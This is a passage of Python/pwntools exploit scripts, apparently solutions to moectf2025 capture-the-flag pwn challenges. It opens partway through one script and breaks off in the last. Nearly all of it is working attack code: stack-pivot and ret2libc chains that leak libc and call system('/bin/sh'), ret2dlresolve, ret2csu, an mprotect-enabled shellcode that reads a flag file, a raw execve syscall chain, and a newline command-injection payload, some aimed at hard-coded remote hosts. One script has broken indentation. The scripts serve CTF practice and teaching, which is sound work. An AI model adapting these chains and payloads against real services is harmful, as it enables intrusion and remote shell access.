set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
b vuln
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
pop_rdi_ret = 0x40119e
ret = 0x40101a
leave_ret = 0x40127b
main = 0x40127d
vuln = 0x401264 #just read
bss = 0x404060

# Stage 1: 0x40 filler, saved rbp = bss + 0x1000, return to the read in vuln.
# The next read therefore writes to bss + 0x1000 - 0x40.
io.recvuntil(b'> ')
payload = b'a'*0x40 + p64(bss + 0x1000) + p64(vuln)
io.send(payload)

puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

# Stage 2 (0x50 bytes): [next rbp = bss+0x800] [pop rdi][puts@got][puts@plt][vuln]
# [0x18 filler] [saved rbp = buffer start] [leave_ret]. 'leave' lands rsp on
# the buffer, pops bss+0x800 into rbp and returns into the puts(puts@got) chain,
# which leaks puts and then reads stage 3 into bss + 0x800 - 0x40.
payload = p64(bss + 0x800) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(vuln) + b'a'*0x18 + p64(bss + 0x1000 - 0x40) + p64(leave_ret)
io.send(payload)

puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success("puts_addr --> "+hex(puts_addr))
libc_base = puts_addr - libc.sym['puts']
log.success("libc_base --> "+hex(libc_base))

system = libc_base + libc.sym['system']
binsh = bss + 0x800 - 0x8  # = buffer + 0x38: the third "/bin/sh\0" copy below

# Stage 3: same frame shape; rdi -> the "/bin/sh" string stored inside this
# very buffer, a ret for alignment, then system.
payload = p64(bss + 0x400) + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system) + b'/bin/sh\x00'*3 + p64(bss + 0x800 - 0x40) + p64(leave_ret)
io.send(payload)

io.interactive()

0x0f inject

#!/usr/bin/env python3
"""moectf2025 pwn - inject.

Command injection rather than memory corruption: the input apparently ends
up inside a shell command line, so a leading newline terminates whatever
precedes it and the rest runs as its own command. The defensive takeaway is
the usual one - never splice untrusted text into a shell string.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 52758
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Newline ends the program's own command; " -- " makes whatever the program
# appends afterwards be treated as arguments, not options (assumption).
payload = b'\n' + b'cat flag -- '

io.sendline(b'4')  # menu choice, presumably
io.send(payload)

io.interactive()

0x10 no_way_to_leak

#!/usr/bin/env python3
"""moectf2025 pwn - no_way_to_leak.

ret2dlresolve with pwntools' helpers: without any libc leak, a forged
dynamic-linker resolution record makes the loader bind "system" itself.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6_2.31-0ubuntu9.18_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 57889
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b vuln
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/libc6-dbg_2.31-0ubuntu9.18_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.31-0ubuntu9.18/amd64/glibc-source_2.31-0ubuntu9.18_all/usr/src/glibc/glibc-2.31
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

offset = 0x78        # distance from the buffer to the return address
read_length = 0x100  # where the forged resolver data is placed in the sent buffer

rop = ROP(elf)
# Forged symbol/relocation records for "system" with "/bin/sh" as argument;
# pwntools picks a writable address (data_addr) for them.
dlresolve = Ret2dlresolvePayload(elf, symbol='system', args=["/bin/sh"])

rop.read(0, dlresolve.data_addr)  # first read() the records from stdin into data_addr
rop.ret2dlresolve(dlresolve)      # then jump to the PLT stub with the forged reloc index
raw_rop = rop.chain()

# One send: the chain at +0x78 and the records at +0x100, so the ROP's read()
# consumes the trailing bytes (assumes the target's read size stops before them - confirm).
payload = flat({offset:raw_rop, read_length:dlresolve.payload})
io.send(payload)
log.info(rop.dump())

io.interactive()

0x11 prelibc

"""moectf2025 pwn - prelibc.

The target prints printf's address up front, which fixes the libc base; one
overflow then runs system("/bin/sh") with a libc 'pop rdi' gadget.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54127
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)
libc_base = leak_addr - libc.sym['printf']
log.info("libc_base --> "+hex(libc_base))

system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b"/bin/sh"))
pop_rdi_ret = libc_base + 0x2a3e5  # 'pop rdi; ret' in this libc build (hard-coded offset)
ret = pop_rdi_ret + 1              # the 'ret' that follows, for 16-byte stack alignment

# 0x48 bytes reach the return address; the whole buffer is padded to 0x100
# with NULs, presumably the size the target reads.
payload = b'a'*0x48 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system)
io.recvuntil(b'> ')
io.send(payload.ljust(0x100, b'\x00'))

io.interactive()

0x12 randomlock

"""moectf2025 pwn - randomlock.

The lock is ten values from rand() % 10000 under a small seed; the script
reproduces them with the same libc. As written, the outer loop's final
unconditional `break` means only seed 0 is ever tried and the process is
never closed between attempts - noted here, left as the author wrote it.
"""
from pwn import *
import ctypes

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 54327
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


# Your exploit here
clib=ctypes.CDLL("/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6")
for i in range(100):
    io = start()
    io.recvuntil(b'me?')
    clib.srand(i)  # candidate seed
    for j in range(10):
        io.recvuntil(b'>')
        val=clib.rand() % 10000;
        io.sendline(str(val))
        res=io.recvline()
        if b"Incorrect password." in res:
            break  # wrong seed: stop this round
    break  # unconditional - ends after the first seed regardless of outcome

io.interactive()

0x13 shellbox

#!/usr/bin/env python3
"""moectf2025 pwn - shellbox.

Statically linked target (absolute gadget and function addresses). The
script stores an open/read/write shellcode, then feeds a ROP chain 8 bytes
at a time that calls mprotect() to make the page holding that buffer
executable and returns into it. Illustrates why W^X alone is not a
sandbox when mprotect is reachable.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 52443
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

#
# Gadgets found in the static binary; only pop_rdi/pop_rsi/pop_rdx are used below.
pop_rax_ret = 0x44bbbb
pop_rdi_ret = 0x401a40
pop_rsi_ret = 0x401a42
pop_rdx_ret = 0x401a44
pop_rsp_ret = 0x4121a8
ret = 0x40101a
syscall = 0x401268
pop_rdi_rbp_ret = 0x4025e1


mprotect = 0x443520
#openat = 0x442840
#read = 0x442950
#write = 0x4429f0

buf = 0x4ceb60  # where the shellcode is stored; inside the page 0x4ce000

# openat(AT_FDCWD, "flag", 0); read(fd, rsp, 0x100); write(1, rsp, rdx).
# 0x67616c66 is "flag" little-endian, 0xffffff9c is AT_FDCWD (-100),
# 257/0/1 are the openat/read/write numbers; rdx keeps 0x100 for the write.
shellcode = asm('''
push 0x67616c66
mov rsi,rsp
xor rdx,rdx
mov rdi,0xffffff9c
push 257
pop rax
syscall
mov rdi,rax
mov rsi,rsp
mov edx,0x100
xor eax,eax
syscall
mov edi,1
mov rsi,rsp
push 1
pop rax
syscall
''')

io.recvuntil(b'.')
io.send(shellcode)

io.recvuntil(b'>')
payload = b'a'*4 + p32(1)  # 4 filler bytes then a 1 - field meaning not visible here
io.send(payload)

def rop(data):
    """Send one 8-byte chain element after the '>' prompt."""
    io.recvuntil(b'>')
    io.send(data)

# mprotect(0x4ce000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC) then return into buf.
rop(p64(pop_rdi_ret))
rop(p64(0x4ce000))
rop(p64(pop_rsi_ret))
rop(p64(0x1000))
rop(p64(pop_rdx_ret))
rop(p64(7))
rop(p64(mprotect))
rop(p64(buf))

io.interactive()

0x14 strcheck

"""moectf2025 pwn - strcheck.

The input must start with "meow"; an embedded NUL stops the string check
early while the full byte count (sent separately) is still copied, so the
return address is overwritten - a length-vs-strlen mismatch.
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 63625
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
sys_addr=0x401236
ret=0x40101a  # alignment gadget
# "meow" + 0x24 NULs = 0x28 bytes up to the return slot; ret then the target.
payload=b'meow'+b'\x00'*0x24+p64(ret)+p64(sys_addr)
io.recvuntil(b'say?')
io.sendline(payload)
io.recvuntil(b'it?')
io.sendline(str(len(payload)))  # the count the program uses for the copy (assumption)


io.interactive()

0x15 syslock

"""moectf2025 pwn - syslock.

Raw-syscall ROP: a negative "mode" value, a "password" that plants
"/bin/sh" in a known .bss location, then a chain that sets rax=59 and
rdi/rsi/rdx before a syscall gadget, i.e. execve("/bin/sh", 0, 0).
"""
from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 51017
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)
# gdb commands used by gdb.debug(); paths are local to the author's machine.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''


def start():
    """Return a tube to the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    elif args.R:
        return remote(host, port)
    else:
        return gdb.debug(elf.path, gdbscript = gs)


io = start()

# Your exploit here
pop_rax_ret=0x401244
syscall=0x401230
pop_rdi_rsi_rdx_ret=0x401240
ret=0x40101a      # not used below
binsh=0x404084    # presumably password buffer + 4, where "/bin/sh" lands - confirm

io.recvuntil(b'mode\n')
io.send(b'-32')  # negative mode value; its effect is decided by the binary, not visible here

io.recvuntil(b'password\n')
payload=p32(59)+b'/bin/sh\x00'  # 4 bytes (59) followed by the string
io.send(payload)

io.recvuntil(b'Mode.\n')
# 0x48 bytes reach the return address; rax=59 (execve), rdi=binsh, rsi=rdx=0.
payload=b'A'*0x48+p64(pop_rax_ret)+p64(59)+p64(pop_rdi_rsi_rdx_ret)+p64(binsh)+p64(0)+p64(0)+p64(syscall)
io.send(payload)

io.interactive()

0x16 xdulaker

from pwn import *

context(os='linux', arch='amd64', log_level='debug')

filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
host = "127.0.0.1"
port = 59912
elf = context.binary = ELF(filename)
if libcname:
libc = ELF(libcname)
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
'''

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# Your exploit here
menu = b'>'

# Option 1 prints a "0x..." pointer; the PIE base is recovered from it
# using the author's offset 0x4010.
io.recvuntil(menu)
io.sendline(b'1')
io.recvuntil(b'0x')
leak_addr = int(io.recv(12), 16)  # 12 hex digits = 48-bit user-space address
elf_base = leak_addr - 0x4010
log.success("elf_base --> "+hex(elf_base))
backdoor = elf_base + 0x1249
ret = elf_base + 0x0101a

# Option 2 expects the key; 8 copies (64 bytes) are sent.
key = b'xdulaker'
io.recvuntil(menu)
io.sendline(b'2')
io.send(key*8)

# Option 3: 0x38 bytes of padding, one ret gadget (presumably for stack
# alignment), then the backdoor address.
io.recvuntil(menu)
io.sendline(b'3')
io.recvuntil(b'xdulaker')
payload = b'a'*0x38 + p64(ret) + p64(backdoor)
io.sendline(payload)

io.interactive()

0x17 calc_beta

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build (2.27 here), remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "39.106.48.123", 23011
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6_2.27-3ubuntu1.6_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6-dbg_2.27-3ubuntu1.6_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/glibc-source_2.27-3ubuntu1.6_all/usr/src/glibc/glibc-2.27
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

def show():
    """Menu option 1: wait for the menu footer and prompt, then choose "show"."""
    for marker in (b'5. Exit', b'> '):
        io.recvuntil(marker)
    io.sendline(b'1')

def edit(idx, data):
    """Menu option 2: store *data* in slot *idx*; both values are sent as decimal text."""
    steps = (
        (b'5. Exit', None),
        (b'> ', b'2'),
        (b'Which number?', None),
        (b'> ', f"{idx}".encode()),
        (b'Change to what?', None),
        (b'> ', f"{data}".encode()),
    )
    for marker, reply in steps:
        io.recvuntil(marker)
        if reply is not None:
            io.sendline(reply)

# pwn :)
# 0x0000000000401253 : pop rdi ; ret
# 0x0000000000401251 : pop rsi ; pop r15 ; ret

#.text:000000000040124A pop rbx
#.text:000000000040124B pop rbp
#.text:000000000040124C pop r12
#.text:000000000040124E pop r13
#.text:0000000000401250 pop r14
#.text:0000000000401252 pop r15
#.text:0000000000401254 retn

#.text:0000000000401230 mov rdx, r15
#.text:0000000000401233 mov rsi, r14
#.text:0000000000401236 mov edi, r13d
#.text:0000000000401239 call ds:(__frame_dummy_init_array_entry - 601E10h)[r12+rbx*8]
#.text:000000000040123D add rbx, 1
#.text:0000000000401241 cmp rbp, rbx
#.text:0000000000401244 jnz short loc_401230

pop_rdi_ret = 0x401253
pop_rsi_r15_ret = 0x401251
ret = pop_rdi_ret + 1  # the lone "ret" at the end of the pop rdi gadget
write_plt = elf.plt['write']
write_got = elf.got['write']
main = 0x4010b4 + 1
#puts_plt = elf.plt['puts']
#puts_got = elf.got['puts']

# Stage 1: fill slots 1..16 with a ret2csu-style chain using the gadgets
# listed in the comments above. Slot 1 is the pop-register gadget; slots
# 2..7 become rbx=0, rbp=1, r12=write_got, r13=1, r14=write_got, r15=0x100,
# so the call gadget at 0x401230 invokes write(1, write_got, 0x100).
# Slots 9..15 absorb the seven pops after the call (rbp == rbx stops the
# loop) and slot 16 returns to main. Slot 0 is written last; it appears to
# overlap the saved return address.
edit(1, 0x40124A)
edit(2, 0)
edit(3, 1)
edit(4, write_got)
edit(5, 1)
edit(6, write_got)
edit(7, 0x100)
edit(8, 0x401230)
edit(9, 0)
edit(10, 0)
edit(11, 0)
edit(12, 0)
edit(13, 0)
edit(14, 0)
edit(15, 0)
edit(16, main)
edit(0, ret)

# The first 6 bytes written back are the resolved write() address.
leak_addr = u64(io.recv(6).ljust(0x8, b'\x00'))
log.info("leak_addr --> "+hex(leak_addr))
libc_base = leak_addr - libc.sym['write']
log.info("libc_base --> "+hex(libc_base))

system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh'))

# Stage 2 (after main re-runs): pop rdi ; ret -> "/bin/sh" -> system.
edit(1, pop_rdi_ret)
edit(2, binsh)
#edit(3, ret)
edit(3, system)
edit(0, ret)

io.interactive()

0x18 calc_meow

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "8.147.132.32", 21281
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# 0x555555554000 num0 = 0x555555555cae

def show():
    """Main menu option 1 (show the stored numbers)."""
    choice = b'1'
    io.recvuntil(b'>')
    io.sendline(choice)

def edit(idx, data):
    """Main menu option 2: write *data* into slot *idx* (both sent as decimal text)."""
    for reply in (b'2', f"{idx}".encode(), f"{data}".encode()):
        io.recvuntil(b'>')
        io.sendline(reply)

def clean():
    """Main menu option 3 (named "clean" by the author; effect not shown here)."""
    choice = b'3'
    io.recvuntil(b'>')
    io.sendline(choice)

def go_calc():
    """Main menu option 4: enter the calculator sub-menu."""
    choice = b'4'
    io.recvuntil(b'>')
    io.sendline(choice)

def add(idx1, idx2, res_idx):
    """Calculator option 1: presumably num[res_idx] = num[idx1] + num[idx2]; indices sent as text."""
    operands = (f"{v}".encode() for v in (idx1, idx2, res_idx))
    for reply in (b'1', *operands):
        io.recvuntil(b'>')
        io.sendline(reply)

def sub(idx1, idx2, res_idx):
    """Calculator option 2: presumably num[res_idx] = num[idx1] - num[idx2]; indices sent as text."""
    operands = (f"{v}".encode() for v in (idx1, idx2, res_idx))
    for reply in (b'2', *operands):
        io.recvuntil(b'>')
        io.sendline(reply)

def exit_calc():
    """Calculator option 6: leave the calculator (returns from its function)."""
    choice = b'6'
    io.recvuntil(b'>')
    io.sendline(choice)

def ret():
    """Menu option 5 (the author's "ret").

    NOTE(review): the script later rebinds the name ``ret`` to a gadget address,
    so this helper is unreachable after that assignment.
    """
    choice = b'5'
    io.recvuntil(b'>')
    io.sendline(choice)

# Offset of the value found in num[0] from the PIE base. NOTE(review): the
# expression evaluates to 0x1cda; the earlier note in this script says 0x1cae.
base = 0x555555555cda - 0x555555554000 # 0x1cda
pop_rdi_nop_ret = 0x1d11
ret = pop_rdi_nop_ret + 2  # NOTE: rebinds the ret() helper above to an address
puts_plt = elf.plt['puts'] # 0x10d4
puts_got = elf.got['puts'] # 0x3f90
log.info("puts_plt --> "+hex(puts_plt))
log.info("puts_got --> "+hex(puts_got))
main = 0x1be5  # not used below
start = 0x1160  # NOTE: rebinds start(); io was already created, so harmless here

# num[0] (reached through the negative index) holds an ELF address; stage the
# slots as offsets relative to it first.
edit(1, pop_rdi_nop_ret - base)
edit(2, puts_got - base)
edit(3, puts_plt - base)
edit(4, start - base)
edit(5, ret - base)

go_calc()

# Add num[0] to each staged slot so they become absolute addresses; puts
# then leaks a libc pointer.
add(0, 1, 1)
add(0, 2, 2)
add(0, 3, 3)
add(0, 4, 4) # returns to _start so execution comes back to main
add(0, 5, 0)

# Return from the calculator: the return address is now `ret`, so execution
# falls through into the chain in the following slots.
exit_calc()

# Take the 6 address bytes that precede the newline puts appends.
leak_addr = u64(io.recvuntil(b'\x0a')[-7:-1].ljust(0x8, b'\x00'))
log.info("leak_addr --> "+hex(leak_addr))
libc_base = leak_addr - libc.sym['puts']
log.info("libc_base --> "+hex(libc_base))

pop_rdi_ret = libc_base + 0x2a3e5  # gadget offset inside this libc build (page-provided)
ret = pop_rdi_ret + 1
system = libc_base + libc.sym['system']
# NOTE(review): str needle; other scripts on this page pass b'/bin/sh'.
binsh = libc_base + next(libc.search('/bin/sh'))

# Second pass: lay out the chain directly (libc base is now known).
edit(1, pop_rdi_ret)
edit(2, binsh)
edit(3, system)
edit(0, ret)

io.interactive()

0x19 计算喵的复仇

#!/usr/bin/env python3
from pwn import *

# Run-time configuration: target binary, the matching libc build, remote endpoint.
context(os='linux', arch='amd64', log_level='debug')

host, port = "39.106.57.152", 20934
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6"
elf = context.binary = ELF(filename)
if libcname:
    libc = ELF(libcname)

# gdb commands used by start() when neither P nor R is given on the command line.
gs = """
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35
"""

def start():
    """Open the target: local process (P), remote service (R), otherwise under gdb."""
    if args.P:
        return process(elf.path)
    if args.R:
        return remote(host, port)
    return gdb.debug(elf.path, gdbscript=gs)


io = start()

# pwn :)
# 0x555555554000 num0 = 0x555555555cae

def show():
    """Main menu option 1 (show the stored numbers)."""
    choice = b'1'
    io.recvuntil(b'>')
    io.sendline(choice)

def edit(idx, data):
    """Main menu option 2: write *data* into slot *idx* (both sent as decimal text)."""
    for reply in (b'2', f"{idx}".encode(), f"{data}".encode()):
        io.recvuntil(b'>')
        io.sendline(reply)

def clean():
    """Main menu option 3 (named "clean" by the author; effect not shown here)."""
    choice = b'3'
    io.recvuntil(b'>')
    io.sendline(choice)

def go_calc():
    """Main menu option 4: enter the calculator sub-menu."""
    choice = b'4'
    io.recvuntil(b'>')
    io.sendline(choice)

def add(idx1, idx2, res_idx):
    """Calculator option 1: presumably num[res_idx] = num[idx1] + num[idx2]; indices sent as text."""
    operands = (f"{v}".encode() for v in (idx1, idx2, res_idx))
    for reply in (b'1', *operands):
        io.recvuntil(b'>')
        io.sendline(reply)

def sub(idx1, idx2, res_idx):
    """Calculator option 2: presumably num[res_idx] = num[idx1] - num[idx2]; indices sent as text."""
    operands = (f"{v}".encode() for v in (idx1, idx2, res_idx))
    for reply in (b'2', *operands):
        io.recvuntil(b'>')
        io.sendline(reply)

def exit_calc():
    """Calculator option 6: leave the calculator (returns from its function)."""
    choice = b'6'
    io.recvuntil(b'>')
    io.sendline(choice)

def ret():
    """Menu option 5 (the author's "ret").

    NOTE(review): the script later rebinds the name ``ret`` to a gadget address,
    so this helper is unreachable after that assignment.
    """
    choice = b'5'
    io.recvuntil(b'>')
    io.sendline(choice)

# Offset of the value found in num[0] from the PIE base (0x1e53).
base = 0x555555555e53 - 0x555555554000 # 0x1e53
pop_rdi_nop_ret = 0x1e8a
pop_rbp_ret = 0x1233  # not used below
ret = pop_rdi_nop_ret + 2  # NOTE: rebinds the ret() helper above to an address
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
log.info("puts_plt --> "+hex(puts_plt))
log.info("puts_got --> "+hex(puts_got))
main = 0x1d5e  # not used below
start = 0x1160  # NOTE: rebinds start(); io was already created, so harmless here
magic_puts = 0x1e75  # not used below
call_read = 0x12db
calc = 0x1cb2  # not used below
edit_num = 0x14d5  # not used below

# Step 1: num[1] += num[0] copies the ELF address held in num[0] into num[1],
# which show() then prints in decimal.
go_calc()
add(0, 1, 1)
exit_calc()

show()

io.recvuntil(b'num1 = ')
leak_addr = int(io.recv(15), 10)  # 15 decimal digits of a 47-bit PIE address
elf_base = leak_addr - 0x1e53
log.info("elf_base --> "+hex(elf_base))

# Step 2: slot 0 (the return address) now points at the read() call site.
edit(0, elf_base + call_read)

# The read() presumably lands on the stack: 8 bytes of filler, then
# ret / pop rdi / puts@got / puts@plt to leak libc, then back into read().
payload = b'a'*0x8 + p64(elf_base + ret) + p64(elf_base + pop_rdi_nop_ret) +\
p64(elf_base + puts_got) + p64(elf_base + puts_plt) + p64(elf_base + call_read)
io.send(payload)

# Take the 6 address bytes that precede the newline puts appends.
leak_addr = u64(io.recvuntil(b'\x0a')[-7:-1].ljust(0x8, b'\x00'))
log.info("leak_addr --> "+hex(leak_addr))
libc_base = leak_addr - libc.sym['puts']
log.info("libc_base --> "+hex(libc_base))

pop_rdi_ret = libc_base + 0x2a3e5  # gadget offset inside this libc build (page-provided)
ret = pop_rdi_ret + 1
system = libc_base + libc.sym['system']
# NOTE(review): str needle; other scripts on this page pass b'/bin/sh'.
binsh = libc_base + next(libc.search('/bin/sh'))

# Step 3: 0x28 bytes of padding, then pop rdi ; ret -> "/bin/sh" -> ret -> system.
